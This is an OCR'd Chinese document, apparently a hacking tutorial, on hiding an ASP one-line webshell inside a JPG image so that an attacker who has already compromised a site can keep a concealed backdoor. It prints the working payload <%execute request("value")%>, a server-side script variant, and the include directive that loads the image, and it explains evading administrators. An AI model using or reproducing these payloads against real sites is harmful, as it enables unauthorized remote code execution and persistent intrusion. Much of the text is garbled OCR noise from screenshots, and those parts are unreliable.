一句话木马图片制作(三种方法).docx

啪 磊 — 图片木马制作的三种方法 Copy命令制作 ?jf=- 包之 廿中+ 対克禅去 壬+ |卫 o 4 * fveraq 大呷 !C X S 团 1-asp 2013/0/16 ltfcSl ft￡P it 阵 1 Kfi ^DWBZlfc 10U1 肿E匚璽當 丄』KE EB EdLt轉 ?2010/11/21 5^9 M6 <B 兰礼！0 鱼聖匕 i| iJ tS=:猿 人本盟G (C uKW m 7农e剋 ..Bert (Ft) i 3^1* l.asp内容: 打开cmd，数据一下命令: 此时打开两个jpg文件，相比:I g E ，jgui^ WmTin--Fi丹￡気￡ 三二辺碍論Hi'□Lr河占M库」？解<：■?做潯韩』榛ms霽吃谨倍蔺'梏■'.■屋k 此时打开两个jpg文件，相比: I g E ， jgui^ WmT in --Fi丹￡気￡ 三二辺碍論Hi '□Lr 河占M 库」？解<：■?做潯韩』榛ms霽吃谨 倍蔺'梏■' .■屋k刖层藤 汗77剖疔瓶: 山—IL J. ㈱ II1WJ T ■淳L譚 V?揪 eUK 举I兮;TI糯 工H兽昶越 . ￥12?:4<pNT#|tt 憊拾卜 ■沁?川“ 7： -；-'：.' Iii'! 埠I踽卜育』 讪 K LR SJE7刊亍锄叶卷f厲 蔽0衙渥漏 ￥?宵菊丹噺帚 抽〔嘉烷聲 冷 :I ?「吐苹巴看盘I ?■ ? ?)trvaT reiqizesl ( irc.l he rJ.3 ￥? E'l唱『[tl'l.11一 孩玉备■赠掛羸 LJ 7 巧? o- _? ww ￡1 慝F埒翳5?莫小r <% #i nclude files= "2.jpg "%> Uedit32 (转载)： 本制作来自于：雪糕。 我们通常在得到 webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来 着晶诫呎 看看。但如果直接加入一句话木马 <%execute request("value")%>到asp文件中时，在该页面 上就会有类似如下的错误： Microsoft VBScript 运行时错误错误’800a000d' 类型不匹配:'execute' /news1/show.asp ，行 3 所以我们就可以开动脑筋了， 使用插入一句话木马的图片做我们的后门。 而且我们如果有足 够的权限的话(希望网站中的文件可写) ，就直接把网站原有的图片变成后门，然后在那个 asp文件中加入调用图片后门的代码： <!--#include file="图片后门地址"--> 这样就没有上面的“类型不匹配：'execute'”错误了，而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现， 当我们直接将我们的一句话木马的 asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。然后我们就又开始 思考并寻找新的方法：制作可以显示图片内容的图片格式后门。 制作步骤： 一、前期准备 材料： 1?一张图片：1.jpg 2?—句话木马服务器端代码: rfc rfc h rhiTk <%execute request("value")%> (其他的一句话也行) —句 Script 标签： <SCRIPT RUNAT=SERVER LANGUAGE=JA VASCRIPT〉一句话木马服务器端代码 </SCRIPT> 调用图片后门代码： <!--#include file="图片地址"--> 工具：UltraEdit 费沥管璨陽■ 町＞ 费沥管璨陽■ 町＞ 匚； D: E: 丈件 匕(?)堀 丄口 L — 43(E) i 工 f in严k 扌 甲千"I t (V 式(r i J遗训) g (Al 窗口 (frj 再 :* 4 □ 'H & ae? pr: 1^ ] IJ X.虫 * 、开始制作: 1?使用UltraEdit打开1.jpg文件，然后按 CTRL +F进行查找图片中的“ ＜%”和“ %＞” 其中＜%的十六进制代码是 3E 25,那么%＞就应该是25 3E，但是我们只把 25改成00; —IC:\Bocu?eiLt3 and SettixigsXxue^ —? ———___一一 _ —一 一 一” 亠辽 一 1 Hl . (JJ J#5R (5) 工視 IF】 WE(V) 桔式CT) FU CL) 建 UiO CK) 億口绷)ffiJ ]*》□睫0 口 I叠您丨ia 叫||塑]尹器輪事丨丨 hl"伽 j F:10 4 A 46 49 46 00 01 □□OOOOOOOh: TY D3 FF EDOOOaOOIDh： OO 64 CO 00 FF El 12 2号 F: 10 4 A 46 49 46 00 01 □ □O